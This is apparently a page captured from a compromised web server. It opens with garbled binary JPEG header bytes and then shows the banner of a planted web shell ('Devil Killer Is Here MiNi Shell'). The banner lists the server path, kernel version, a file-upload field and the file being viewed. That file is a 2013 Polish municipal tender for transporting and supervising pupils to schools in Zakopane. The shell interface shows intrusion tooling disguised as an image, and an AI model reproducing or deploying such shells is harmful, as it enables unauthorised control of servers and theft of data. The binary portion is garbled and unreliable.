JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130722/285680-N-2013.html

<p class="kh_header"><b>Zakopane: BZP.271.58.2013 świadczenie  usługi  polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014.</b><br>
<b>Numer ogłoszenia: 285680 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.58.2013 świadczenie  usługi  polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014


Zakres zamówienia obejmuje : 

Zadanie  I. 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Szkoły Podstawowej nr 7 na   Cyrhli do Gimnazjum nr 3 na Olczy, Janosówka 15 i z powrotem, tj. z ww Gimnazjum na   Cyhrlę - przewidywana ilość 13 uczniów.

Zadanie  II. 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Krzeptówek do Gimnazjum nr 1, ul. Nowotarska 42 i z powrotem, tj. z Gimnazjum nr 1 na Krzeptówki - przewidywana ilość 20  uczniów. 

Zadanie  III.

Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Szkoły Podstawowej nr 2 i z powrotem, tj. z SP nr 2 na Gubałówkę - przewidywana ilość 37 uczniów.

UWAGA!!!    Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton.  Jeżeli przewóz będzie się odbywał przez Kościelisko, koniecznym jest aby pojazd dojeżdżał do Furmanowej I.

Zadanie IV. 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Gimnazjum nr 1 oraz Szkoły Podstawowej nr 5 i z powrotem, tj. z ww szkół na Gubałówkę - przewidywana ilość 38 uczniów. 

Uwaga!!! Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton. Jeżeli przewóz będzie się odbywał od strony Zębu, koniecznym jest aby pojazd dojeżdżał Gubałówka Kaplica.


UWAGA!! Przy ww zadaniach przystanki początkowe i końcowe będą ustalone w miarę potrzeb uczniów

 Zamawiający informuje ,że podana liczba uczniów na danej trasie  może  ulec zmianie


Opiekę  podczas przewozu uczniów zapewnia wykonawca ,  w każdym pojeździe wykonawca zobowiązany jest  zapewnić  opiekuna podczas  przewozu  uczniów - wymagana jest osoba pełnoletnia:
- przeciwko, której nie toczy się postępowanie karne, postępowanie dyscyplinarne lub  postępowanie o ubezwłasnowolnienie
- nie była skazana prawomocnym wyrokiem za umyślne przestępstwo,
- zna podstawy udzielania pierwszej pomocy 

Zamawiający zastrzega  ,że kierowca nie może pełnić  jednocześnie roli kierowcy i opiekuna .

 Wykonawca zobowiązany jest do przestrzegania przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U.z2003 r. Nr 32,poz. 262 z późn. zm  )    

Usługi objęte  zamówieniem mają być  świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie wymogi bezpieczeństwa  związane z przewozem pasażerskim o którym mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2012 r. poz. 1265 z późn. zm.) i ustawy  Prawo o ruchu drogowym 
( Dz.U. z 2012 r. poz.113 z późn. zm )   przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. 

Wykonawca  ma  zapewnić odpowiednią liczbę miejsc siedzących ( jako miejsca siedzące należy uwzględnić ilość  uczniów podaną przez zamawiającego plus miejsce siedzące dla opiekuna i dla kierowcy)  do wymagań danej trasy. 
 W przypadku awarii środka transportowego Wykonawca zapewni zastępczy środek transportu, w taki sposób aby nie powodować opóźnień czasowych kursu i nie powodować nadmiernego (ponad limit miejsc siedzących) zwiększenia liczby przewożonych uczniów. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów

W pojeździe  w czasie przewozu  nie może być większa liczba  osób  niż dopuszczalna, określona w dowodzie rejestracyjnym 
Wykonawca musi zapewnić przewożonym uczniom oraz opiekunom  odpowiednie warunki bezpieczeństwa i higieny tj: 
a) utrzymywać w czystości i porządku  pojazdy
b) przestrzegać przepisy P.Poż. i BHP 
c) ubezpieczyć  pojazdy  i  uczniów  oraz kierowcę i opiekunów  na czas przewozu z tytułu szkody, które mogą wyniknąć w związku z wykonywaniem zamówienia
d) oznaczyć  pojazd na czas przewozu -że wykorzystywany jest do transportu dzieci szkolnych.

 Usługi przewozowe   - dowozy uczniów do przedmiotowych placówek oświatowych w Gminie  Miasta Zakopane  będą realizowane w godzinach ustalonych przez dyrektorów szkół wyłącznie w dni nauki szkolnej tj. z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia18 kwietnia 2002r. w sprawie organizacji roku szkolnego (Dz. U.  z 2002r. Nr 46, poz.. 432, z późn. zm.) 

W przypadku odrabiania zajęć szkolnych w placówce w dniu, kiedy wykonawca nie będzie świadczył usługi i odwołania zajęć w dniu objętym niniejszym zamówieniem , dyrektor placówki pisemnie powiadomi o odwołaniu i odrabianiu zajęć na 3 dni wcześniej. Wykonawca zobowiązany jest we wskazanym dniu do wykonania usługi. 

Wykonawca z którym zostanie podpisana umowa ustali optymalny rozkład jazdy, mając na uwadze jak najkrótszy czas przebywania  młodzieży szkolnej  w podróży, z uwzględnieniem ,że młodzież  ma  być dowieziona do szkoły w takim czasie, aby możliwe było terminowe rozpoczęcie przez nią zajęć lekcyjnych .Rozkład jazdy musi być dostosowany do obowiązującego w danej placówce szkolnej  harmonogramu -planu zajęć.
 
Szczegółowy   harmonogram   przewozu   młodzieży  oraz  dane osób pełniących rolę opiekunów  ,   wykonawca   przekaże   zamawiającemu  -Naczelnikowi  Wydziału Edukacji Turystyki i Sportu  Urzędu Miasta Zakopane  w  nieprzekraczalnym  terminie  do 30 dni od rozpoczęcia świadczenia usługi będącej przedmiotem zamówienia, po  dokonaniu   uzgodnień   z   dyrektorami   poszczególnych   szkół,   do których uczęszcza młodzież  objęta dowozem.

3.   Harmonogram dowozu dzieci musi zawierać:
1) opis   trasy dojazdu do szkoły i z powrotem
2) szczegółowe godziny kursów 
3)  danych osobowych oraz numeru telefonu komórkowego  opiekuna 
   
W przypadku zmiany organizacji zajęć szkolnych  polegającej na skróceniu godzin nauki (np. rekolekcje, święto szkoły itp. uroczystości),wykonawca zostanie  niezwłocznie powiadomiony  przez Dyrektora szkoły   o zmianie terminu dowozu  i odwozu uczniów

Do obowiązków osoby sprawującej opiekę nad uczniami będzie należało: 
1)sprawdzenie stanu liczbowego uczniów wewnątrz pojazdu,
2) pilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w pojeździe.
3)zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,
4)zapewnienie bezpiecznego wsiadania i wysiadania z pojazdu
5) przeprowadzenie uczniów przez jezdnię do budynku szkoły i odbiór uczniów ze szkoły do   autobusu

W celu realizacji umowy, Wykonawca zobowiązany jest uzyskać od Burmistrza Miasta Zakopane lub Starosty Tatrzańskiego zezwolenia na wykonywanie przewozów regularnych specjalnych,

Zamawiający wymaga aby wykonawca wskazał w swojej ofercie  konkretny pojazd/-y, którym będzie regularnie świadczył usługę. W przypadku świadczenia usługi innym pojazdem w okresie letnim, a innym w okresie zimowym - należy rozróżnić pojazd do obsługi w lecie i pojazd do obsługi w warunkach zimowych. W przypadku użycia pojazdu zastępczego obowiązuje pisemne zgłaszanie (lub np. telefonicznie i następnie przesłanie pisma faxem) konkretnych okresów (dni lub kursów) wykonywanych pojazdem zastępczym,

W razie wystąpienia przejściowych okoliczności uniemożliwiających świadczenie usług Wykonawca we własnym zakresie, na własny koszt zapewni pojazdy zastępcze                       o parametrach nie gorszych niż jego samochody oraz osoby, które w jego imieniu i za pisemną zgodą Zamawiającego  będą świadczyć usługi,

 Wykonawca zobowiązany jest przy doborze pojazdów do  świadczenia usług zwłaszcza dla  zadania nr III i nr IV  uwzględnić fakt występowania ograniczenia rzeczywistej masy pojazdów do 5 ton (znak B-18 - 5t) oraz trudne warunki drogowe związane z górzystą rzeźbą terenu i  występującymi  w ostatnich latach silnymi opadami atmosferycznymi.

Zamawiający informuje, że w okresie świadczenia przez wykonawcę usług,  jest upoważniony do kontroli, włącznie ze stanem i wyposażeniem pojazdu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca   wykaże ,że  posiadał aktualną     licencję   zezwalającą   na   wykonywanie   krajowego transportu drogowego osób obejmującej co najmniej obszar powiatu tatrzańskiego  zgodnie z  ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2012 r. poz. 1265 z późn. zm.) 
Ocena spełnienia powyższego  warunku  będzie dokonywana, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu

Ocena spełnienia powyższych warunków będzie dokonywana  w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże się dla zadania / zadań na które składa ofertę dysponowaniem pojazdem posiadającym aktualne badania techniczne  o wymaganej liczbie miejsc siedzących  tj. dla uczniów, opiekuna i kierowcy. 
Przy doborze pojazdów do obsługi zadania nr III i nr IV należy uwzględnić fakt występowania ograniczenia rzeczywistej masy pojazdów do 5 ton (znak B-18 - 5t).
  
Ocena spełnienia powyższego  warunku  będzie dokonywana  w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  że do świadczenia usług  dysponuje  pełnoletnimi opiekunami w zakresie danego zadania w ilości zgodnej z ilością samochodów jakimi będzie świadczona usługa i   kierowcami  w ilości zapewniającej obsługę w zakresie danego zadania  pojazdów będących w ruchu spełniających wymagania określone w przepisach ustawy z dnia   6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2012 r. poz. 1265 z późn. zm.)  oraz ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym ( Dz.U. z 2012 r. poz.113 z późn. zm )określających wymagania w stosunku do kierowców. 

 Ocena spełnienia powyższych warunków będzie dokonywana, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu

Ocena spełnienia powyższych warunków będzie dokonywana  w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	poświadczona przez  wykonawcę  za zgodność z oryginałem, kserokopia dowodu rejestracyjnego pojazdu, którym będzie świadczona usługa danego zadania

2)	poświadczona przez wykonawcę za zgodność z oryginałem, kserokopia prawa jazdy  dla wskazanego w ofercie kierowcy   dla danego zadania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje możliwość zmiany umowy  na pisemny umotywowany wniosek wykonawcy w przypadku:
1.Zmiany osób ( kierowca/ opiekun)  wykazanych w ofercie  na inne legitymujące się, co najmniej równoważonymi uprawnieniami, w przypadku zdarzeń losowych takich jak: choroba, śmierć , rezygnacji ze  świadczenia usługi, utraty uprawnień i.t.p.
2.Zmian  pojazdów jakie zostały wykazane do realizacji zamówienia w przypadku zdarzeń losowych niezależnych od wykonawcy typu awaria pojazdu uniemożliwiająca świadczenie usług zgodnie z wymaganiami zamawiającego.
3. Ustawowej zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Edukacji Turystyki i Sportu pok.218
Urząd Miasta Zakopane
ul. Kościuszki 13 
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8 
Urząd Miasta Zakopane
ul. Kościuszki 13 
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin  świadczenia usług :  od  02.09.2013r. do 27.06.2014r. (  szacowana  ilość dni - 188  ) w godzinach ustalonych przez dyrektorów  szkół, z wyłączeniem okresu zimowej przerwy świątecznej, ferii zimowych, wiosennej przerwy świątecznej oraz niedziel i dni wolnych od zajęć szkolnych 
W przypadku odrabiania zajęć szkolnych  w dniach w których nie miały być świadczone usługi   lub odwołaniem  zajęć w dniach objętych świadczeniem usług,  dyrektor placówki pisemnie ( dopuszcza się formę faksu)  powiadomi wykonawcę  o odwołaniu  lub  odrabianiu zajęć na 3 dni wcześniej. 
Wykonawca zobowiązany jest we wskazanym dniu do  świadczenia  usługi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Szkoły Podstawowej nr 7 na  Cyrhli do Gimnazjum nr 3 na Olczy, Janosówka 15 i z powrotem, tj. z ww Gimnazjum na   Cyhrlę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014


Zakres zamówienia obejmuje usługa dowozu i opieki  uczniów zamieszkałych w rejonie Szkoły Podstawowej nr 7 na    
 Cyrhli do Gimnazjum nr 3 na Olczy, Janosówka 15 i z powrotem, tj. z ww Gimnazjum na 
  Cyhrlę - przewidywana ilość 13 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Krzeptówek do Gimnazjum nr 1, ul. Nowotarska 42 i z powrotem, tj. z Gimnazjum nr 1 na Krzeptówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014

Zakres zamówienia obejmuje usługę dowozu i opieki  uczniów zamieszkałych w rejonie Krzeptówek do Gimnazjum nr 1, ul. Nowotarska 42 i z powrotem, tj. z Gimnazjum nr 1 na Krzeptówki - przewidywana ilość 20  uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Szkoły Podstawowej nr 2 i z powrotem, tj. z SP nr 2 na Gubałówkę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2013-2014

Zakres zamówienia obejmuje Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Szkoły Podstawowej nr 2 i z powrotem, tj. z SP nr 2 na Gubałówkę - przewidywana ilość 37 uczniów.

